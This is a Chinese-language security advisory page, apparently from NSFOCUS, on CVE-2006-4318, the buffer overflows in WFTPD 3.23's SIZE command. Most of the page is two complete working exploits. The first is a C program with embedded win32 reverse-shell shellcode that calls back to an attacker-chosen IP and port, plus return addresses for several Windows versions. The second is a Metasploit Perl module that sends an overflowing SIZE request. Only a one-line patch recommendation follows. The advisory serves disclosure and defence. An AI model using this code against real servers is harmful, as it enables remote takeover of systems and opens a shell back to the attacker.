安全研究

安全漏洞
WFTPD服务器多个远程缓冲区溢出漏洞

发布日期:2006-08-22
更新日期:2006-12-27

受影响系统:
Texas Imperial Software WFTPD 3.23
描述:
BUGTRAQ  ID: 19617
CVE(CAN) ID: CVE-2006-4318

WFTPD是Windows平台下的FTP服务程序。

WFTPD在处理带有超长畸形参数的多个命令请求时存在漏洞,远程攻击者可能利用这些漏洞获取系统的控制或造成拒绝服务。

<**>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

///////////////////////////////////////////////////////////////////////
// WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit ///////
// coded by h07 <h07@interia.pl> /////////////////////////////////////
// tested on XP SP2 polish, 2000 SP4 polish ///////////////////////////
///////////////////////////////////////////////////////////////////////

#include <winsock2.h>
#define BUFF_SIZE 1024
#define PORT 21

//win32 reverse shellcode (metasploit.com)

char shellcode[] =

"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6"
"\x10\x92\x98\x83\xeb\xfc\xe2\xf4\x4a\x7a\x79\xd5\x5e\xe9\x6d\x67"
"\x49\x70\x19\xf4\x92\x34\x19\xdd\x8a\x9b\xee\x9d\xce\x11\x7d\x13"
"\xf9\x08\x19\xc7\x96\x11\x79\xd1\x3d\x24\x19\x99\x58\x21\x52\x01"
"\x1a\x94\x52\xec\xb1\xd1\x58\x95\xb7\xd2\x79\x6c\x8d\x44\xb6\xb0"
"\xc3\xf5\x19\xc7\x92\x11\x79\xfe\x3d\x1c\xd9\x13\xe9\x0c\x93\x73"
"\xb5\x3c\x19\x11\xda\x34\x8e\xf9\x75\x21\x49\xfc\x3d\x53\xa2\x13"
"\xf6\x1c\x19\xe8\xaa\xbd\x19\xd8\xbe\x4e\xfa\x16\xf8\x1e\x7e\xc8"
"\x49\xc6\xf4\xcb\xd0\x78\xa1\xaa\xde\x67\xe1\xaa\xe9\x44\x6d\x48"
"\xde\xdb\x7f\x64\x8d\x40\x6d\x4e\xe9\x99\x77\xfe\x37\xfd\x9a\x9a"
"\xe3\x7a\x90\x67\x66\x78\x4b\x91\x43\xbd\xc5\x67\x60\x43\xc1\xcb"
"\xe5\x53\xc1\xdb\xe5\xef\x42\xf0\xb6\x10\x92\x98\xd0\x78\x92\x98"
"\xd0\x43\x1b\x79\x23\x78\x7e\x61\x1c\x70\xc5\x67\x60\x7a\x82\xc9"
"\xe3\xef\x42\xfe\xdc\x74\xf4\xf0\xd5\x7d\xf8\xc8\xef\x39\x5e\x11"
"\x51\x7a\xd6\x11\x54\x21\x52\x6b\x1c\x85\x1b\x65\x48\x52\xbf\x66"
"\xf4\x3c\x1f\xe2\x8e\xbb\x39\x33\xde\x62\x6c\x2b\xa0\xef\xe7\xb0"
"\x49\xc6\xc9\xcf\xe4\x41\xc3\xc9\xdc\x11\xc3\xc9\xe3\x41\x6d\x48"
"\xde\xbd\x4b\x9d\x78\x43\x6d\x4e\xdc\xef\x6d\xaf\x49\xc0\xfa\x7f"
"\xcf\xd6\xeb\x67\xc3\x14\x6d\x4e\x49\x67\x6e\x67\x66\x78\x62\x12"
"\xb2\x4f\xc1\x67\x60\xef\x42\x98";

void config_shellcode(unsigned long ip, unsigned short port)
  {
  memcpy(&shellcode[184], &ip, 4);
  memcpy(&shellcode[190], &port, 2);
  }

unsigned long target[] =
  {
  0x7d16887b, //JMP ESI (XP SP2 polish)
  0x776f2015, //JMP ESI (2000 SP4 polish)
  0x7cb9e082, //JMP ESI (XP SP2 english)
  0x7848a5f1, //JMP ESI (2000 SP4 english)
  0x7ca96834 //JMP ESI (XP SP2 german)
  };

char buffer[BUFF_SIZE];

main(int argc, char *argv[])
{
int sock, id, opt, r_len;
unsigned long eip;
unsigned long connectback_IP;
unsigned short connectback_port;
struct hostent *he;
struct sockaddr_in client;
WSADATA wsa;

printf("\n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit\n");
printf("[*] coded by h07 <h07@interia.pl>\n");

if(argc < 8)
  {
  printf("[*] usage:..\n %s <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>\n\n", argv[0]);
  printf("[*] ID list:\n");
  printf("[>] 0: XP SP2 polish\n");
  printf("[>] 1: 2000 SP4 polish\n");
  printf("[>] 2: XP SP2 english\n");
  printf("[>] 3: 2000 SP4 english\n");
  printf("[>] 4: XP SP2 german\n\n");
  printf("[*] opt - WFTPD option 'restrict to home directory and below'\n");
  printf("[>] 0: disabled\n");
  printf("[>] 1: enabled\n\n");
  printf("[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444\n\n", argv[0]);
  exit(0);
  }

WSAStartup(MAKEWORD(2, 0), &wsa);

id = atoi(argv[1]);
opt = atoi(argv[2]);

if((id > 4) || (id < 0))
  {
  printf("[-] ID error: unknown target\n");
  exit(-1);
  }
  
if((opt > 1) || (opt < 0))
  {
  printf("[-] opt error: unknown option\n");
  exit(-1);
  }
  
eip = target[id];
connectback_IP = inet_addr(argv[6]) ^ (ULONG)0x989210b6;
connectback_port = htons(atoi(argv[7])) ^ (USHORT)0x9892;
config_shellcode(connectback_IP, connectback_port);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if((he = gethostbyname(argv[3])) == NULL)
  {
  printf("[-] Unable to resolve\n");
  exit(-1);
  }

client.sin_addr = *((struct in_addr *)he->h_addr);
client.sin_port = htons(PORT);
client.sin_family = AF_INET;

if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
  {
  printf("[-] error: connect()\n");
  exit(-1);
  }

recv(sock, buffer, BUFF_SIZE -1, 0);

//USER
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "USER %s\r\n", argv[4]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);

//PASS
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "PASS %s\r\n", argv[5]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);

if(strstr(buffer, "530") != 0) exit(-1);

//SIZE
memset(buffer, 0x90, BUFF_SIZE);
memcpy(buffer, "SIZE ", 5);

switch(opt)
  {
  case 0:
    {
    memcpy(buffer + 5, "/", 1);
    r_len = 531;
    break;
    }
  case 1:
    {
    memcpy(buffer + 5, "//", 2);
    r_len = 532;
    break;
    }
  }

memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);
*((unsigned long*)(&buffer[r_len])) = eip;
memcpy(buffer + (r_len + 4), "\r\n\x00", 3);


if(send(sock, buffer, strlen(buffer), 0) != -1)
  printf("[+] sending buffer: ok\n");
  else
  printf("[-] sending buffer: failed\n");
    
printf("[*] press enter to quit\n");
getchar();
}



##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::wftpd_size_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };
my $info =
  {
    'Name'    => 'WFTPD Server 3.23 SIZE Command Buffer Overflow',
    'Version' => '$Revision: 1.0 $',
    'Authors' =>
      [ 'Jacopo Cervini <acaro [at] jervus.it>',
        
      ],

    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
    'Priv'  => 0,

    'AutoOpts'  => { 'EXITFUNC' => 'process' },
    'UserOpts'  =>
      {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 21],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
        'USER'  => [1, 'DATA', 'Username', 'test'],
        'PASS'  => [1, 'DATA', 'Password', 'test'],
        'FLAG'  => [1, 'BOOL', 'Set to 1 if your user have a
restrict to home directory flag'],
      },

    'Payload' =>
      {
        'Space'  => 400,
        'BadChars'  => "\x00\x0a",

        
        'Keys'         => ['+ws2ord'],
      },

    'Description'  =>  Pex::Text::Freeform(qq{
      This module exploits the buffer overflow found in the SIZE command
      in WFTPD Server 3.23.  
    Credit to h07 for the discovery of this vulnerability.
}),

    'Refs'  =>
      [
        ['BID', '19617'],
        [ 'CVE', '2006-4318' ],
      ],

    'DefaultTarget' => 0,
    'Targets' =>
      [

    ['Win2k English SP4', 0x7c2d15e7 ], #call esi in ADVAPI32.dll
    ['Win2k Italian SP4', 0x792615e7 ], #call esi in ADVAPI32.dll
    ['WinXP Pro English SP2', 0x77dd6eda ], #call esi in
ADVAPI32.dll
    ['WinXP Pro Italian SP2', 0x77f46eda ], #call esi in
ADVAPI32.dll
    ['WinXP Pro English SP0', 0x77dd19ae ], #call esi in
ADVAPI32.dll
      ],

    'Keys' => ['wftpd'],

    'DisclosureDate' => 'Aug 21 2006',
  };

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' =>
$advanced}, @_);
    return($self);
}


sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target      = $self->Targets->[$target_idx];
    
        if (! $self->InitNops(128)) {
        $self->PrintLine("[*] Failed to initialize the NOP
module.");
        return;
    }

    
    

    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
      );

    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' .
$s->GetError);
        return;
    }
    $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using ret
address at 0x%.8x...", $target->[1]));

    my $r = $s->RecvLineMulti(20);
    if (! $r) { $self->PrintLine("[*] No response from FTP server");
return; }
    $self->Print($r);

    $s->Send("USER ".$self->GetVar('USER')."\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) { $self->PrintLine("[*] No response from FTP server");
return; }
    $self->Print($r);

    $s->Send("PASS ".$self->GetVar('PASS')."\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) { $self->PrintLine("[*] No response from FTP server");
return; }
    $self->Print($r);

if ($self->GetVar('FLAG') == 0) {

    $a="/";

        }

if ($self->GetVar('FLAG') == 1) {
        
    $a="//";
    }

my $request = $a.$shellcode;
    $request .= $self->MakeNops(0x20d-length($shellcode));
        $request .= pack("V", $target->[1]);


    $s->Send("SIZE $request\r\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) { $self->PrintLine("[*] No response from FTP server");
return; }
    $self->Print($r);

    sleep(2);
    return;
}

建议:
厂商补丁:

Texas Imperial Software
-----------------------
目前厂商已经在最新版本的软件中修复了这个安全问题,请到厂商的主页下载:

http://www.wftpd.com/

浏览次数:3964
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客